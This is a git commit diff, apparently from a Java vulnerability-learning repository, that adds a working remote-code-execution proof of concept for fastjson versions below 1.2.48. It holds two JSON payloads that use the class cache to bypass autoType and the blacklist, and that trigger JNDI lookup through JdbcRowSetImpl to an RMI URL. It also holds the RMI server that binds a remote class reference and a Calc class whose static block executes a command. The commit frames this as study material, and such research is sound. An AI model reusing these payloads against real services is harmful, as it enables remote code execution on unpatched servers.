增加fastjson 1.2.47及以下通杀payload的学习demo（<1.2.48）

xuanyh · xuanyh · commit 5a87b38c36dc · 2019-07-11T13:57:35.000+08:00
diff --git a/README.md b/README.md
@@ -1,3 +1,3 @@
-1. \learnjavabug\src\main\java\com\xyh\collections3\no1
-2. \learnjavabug\src\main\java\com\xyh\collections3\no2
-3. \learnjavabug\src\main\java\com\xyh\fastjson
+### fastjson poc
+1. com.xyh.fastjson.FastjsonSerialize 利用条件：fastjson <= 1.2.24 + Feature.SupportNonPublicField
+2. com.xyh.fastjson.NoNeedAutoTypePoc 利用条件：fastjson < 1.2.48 不需要任何配置，默认配置通杀RCE
diff --git a/src/main/java/Calc.java b/src/main/java/Calc.java
@@ -0,0 +1,16 @@
+/**
+ * @author xuanyh
+ */
+public class Calc {
+  static {
+    try {
+      Runtime.getRuntime().exec("/Applications/Calculator.app/Contents/MacOS/Calculator");
+    } catch (Throwable e) {
+      e.printStackTrace();
+    }
+  }
+
+  public static void main(String[] args) {
+
+  }
+}
diff --git a/src/main/java/com/xyh/fastjson/FastjsonSerialize.java b/src/main/java/com/xyh/fastjson/FastjsonSerialize.java
@@ -6,7 +6,7 @@
 import sun.misc.BASE64Encoder;
 
 /**
- * 利用fastjson开启type的漏洞
+ * 利用fastjson开启type的漏洞，fastjson版本<=1.2.24 + Feature.SupportNonPublicField
  *
  * Created by xuanyonghao on 2018/5/5.
  */
diff --git a/src/main/java/com/xyh/fastjson/NoNeedAutoTypePoc.java b/src/main/java/com/xyh/fastjson/NoNeedAutoTypePoc.java
@@ -0,0 +1,49 @@
+package com.xyh.fastjson;
+
+import com.alibaba.fastjson.JSON;
+import com.sun.jndi.rmi.registry.ReferenceWrapper;
+import java.rmi.AlreadyBoundException;
+import java.rmi.RemoteException;
+import java.rmi.registry.LocateRegistry;
+import java.rmi.registry.Registry;
+import javax.naming.NamingException;
+import javax.naming.Reference;
+
+/**
+ * fastjson 1.2.48以下不需要任何配置，默认配置通杀RCE
+ * @author xuanyh
+ */
+public class NoNeedAutoTypePoc {
+
+  static {
+    //rmi server示例
+    try {
+      Registry registry = LocateRegistry.createRegistry(43657);
+      //TODO 把resources下的Calc.class拷贝到下面代码所示http://host:port的web服务器根目录即可
+      Reference reference = new Reference("Calc","Calc","http://localhost/");
+      ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
+      registry.bind("Calc",referenceWrapper);
+    } catch (RemoteException e) {
+      e.printStackTrace();
+    } catch (AlreadyBoundException e) {
+      e.printStackTrace();
+    } catch (NamingException e) {
+      e.printStackTrace();
+    }
+  }
+
+  public static void main(String[] args) {
+    //jdk版本高的需要开启URLCodebase trust
+    System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase","true");
+
+    /*
+    * TODO 该payload需要先通过java.lang.Class把com.sun.rowset.JdbcRowSetImpl加载进fastjson缓存，然后利用
+    * TODO checkAutoType方法的缺陷（先通过缓存查询，有则立马返回，否则检查黑名单hash）绕过黑名单和autoType的检查
+    */
+    String payload = "{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"}";
+    String payload2 = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://localhost:43657/Calc\",\"autoCommit\":true}";
+    JSON.parse(payload);
+    JSON.parse(payload2);
+    //所以，该payload需要分两步进行
+  }
+}
diff --git a/src/main/resources/Calc.class b/src/main/resources/Calc.class

Original file line number	Diff line number	Diff line change
`@@ -6,7 +6,7 @@`
`6`	`6`	`import sun.misc.BASE64Encoder;`
`7`	`7`
`8`	`8`	`/**`
`9`		`- * 利用fastjson开启type的漏洞`
	`9`	`+ * 利用fastjson开启type的漏洞，fastjson版本<=1.2.24 + Feature.SupportNonPublicField`
`10`	`10`	`*`
`11`	`11`	`* Created by xuanyonghao on 2018/5/5.`
`12`	`12`	`*/`